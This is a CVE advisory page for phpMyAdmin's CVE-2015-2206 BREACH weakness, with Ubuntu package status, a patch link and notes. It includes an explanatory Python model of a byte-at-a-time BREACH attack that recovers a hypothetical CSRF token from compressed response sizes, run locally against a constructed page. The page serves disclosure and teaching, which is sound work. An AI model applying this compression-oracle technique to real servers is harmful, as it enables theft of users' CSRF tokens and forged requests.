CVE-2015-2206

Published: 09 March 2015

libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.
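How the side channel in that description works, as an added example (a constructed model, not phpMyAdmin's code or markup): a page that reflects the attacker's lang value in the same compressed body as a CSRF token lets an attacker who sees only the response size recover the token one character at a time, because a guess that matches the token lengthens an LZ77 back-reference and the body compresses smaller. Assumptions, labelled in the code as well: the markup and the token are hypothetical, the invalid value is echoed verbatim, zlib's fixed Huffman strategy is used so the sizes are deterministic, and the hardened variant simply stops echoing the value (an assumption about the fix, not taken from the upstream commit).

```python
"""Model of the CVE-2015-2206 BREACH scenario: a response that reflects an
attacker-chosen 'lang' value next to a CSRF token and is sent compressed.
Constructed illustration (hypothetical markup and token), not phpMyAdmin code."""
import zlib

SECRET_TOKEN = "a91f03bc7e2d4c58"   # constructed, hypothetical CSRF token
ALPHABET = "0123456789abcdef"       # token alphabet the attacker assumes


def vulnerable_page(lang: str) -> bytes:
    """Pre-fix behaviour as the advisory describes it: the unknown-language
    error echoes the unrecognised value, in the same body as the token."""
    return (
        "<html><body><p>Unknown language: " + lang + "</p>"
        '<form method="post"><input type="hidden" name="token" '
        'value="' + SECRET_TOKEN + '"></form></body></html>'
    ).encode()


def hardened_page(lang: str) -> bytes:
    """Assumed post-fix behaviour: the unrecognised value is not echoed, so no
    attacker-controlled text shares the compressed body with the token."""
    return (
        "<html><body><p>Unknown language.</p>"
        '<form method="post"><input type="hidden" name="token" '
        'value="' + SECRET_TOKEN + '"></form></body></html>'
    ).encode()


def compressed_size(body: bytes) -> int:
    """What the attacker observes: the Content-Length of the DEFLATEd body.
    Fixed Huffman codes (Z_FIXED) make the sizes deterministic here; a real
    server's dynamic tables add noise that is averaged out with more requests."""
    c = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS,
                         zlib.DEF_MEM_LEVEL, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


# Sizes are whole bytes, so the 7-8 bits saved by one extra matched character
# can be rounded away. Each guess is therefore sent twice, once with a pad
# whose cost (three literals plus a 3-byte back-reference, 36 bits) is not a
# multiple of 8 bits, so the two sizes cannot both hide the saving.
PADS = ("", "XYZXYZ")


def oracle_cost(page, reflected: str) -> int:
    """Summed response sizes for one reflected string across both pad variants."""
    return sum(compressed_size(page(reflected + pad)) for pad in PADS)


def recover_token(page, length: int = 16):
    """Byte-at-a-time BREACH: the candidate that lengthens the LZ77 match
    between the reflection and the real 'value="<token>' compresses smaller.
    Returns None when no candidate wins outright (nothing is reflected)."""
    known = ""
    for _ in range(length):
        costs = {c: oracle_cost(page, 'value="' + known + c) for c in ALPHABET}
        best = min(costs.values())
        winners = [c for c, cost in costs.items() if cost == best]
        if len(winners) != 1:
            return None
        known += winners[0]
    return known


if __name__ == "__main__":
    print("vulnerable page:", recover_token(vulnerable_page))   # a91f03bc7e2d4c58
    print("hardened page:  ", recover_token(hardened_page))     # None
```

Against the vulnerable page the loop needs 16 candidates times 2 requests per character; against the hardened page every candidate produces the same body, so every position ties and the attack yields nothing, which is the property the upstream change is meant to restore. On a real deployment the same measurement is made over gzip with dynamic Huffman tables, so each step needs more requests to separate the signal from Huffman noise, but the byte-at-a-time structure is unchanged.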

Priority

Low

Status

Package Release Status
phpmyadmin
Upstream: Released (4:4.4.4-1, 4.3.11.1)
Ubuntu 21.10 (Impish Indri): Not vulnerable (4:4.4.5-1)
Ubuntu 21.04 (Hirsute Hippo): Not vulnerable (4:4.4.5-1)
Ubuntu 20.10 (Groovy Gorilla): Not vulnerable (4:4.4.5-1)
Ubuntu 20.04 LTS (Focal Fossa): Not vulnerable (4:4.4.5-1)
Ubuntu 18.04 LTS (Bionic Beaver): Not vulnerable (4:4.4.5-1)
Ubuntu 16.04 ESM (Xenial Xerus): Not vulnerable (4:4.4.5-1)
Ubuntu 14.04 ESM (Trusty Tahr): Needed

Patches:
Upstream: https://github.com/phpmyadmin/phpmyadmin/commit/b2f1e895038a5700bf8e81fb9a5da36cbdea0eeb

Notes

Author: tyhicks
Note: "Versions 4.0.x (prior to 4.0.10.9), 4.2.x (prior to 4.2.13.2) and 4.3.x (prior to 4.3.11.1) are affected."

References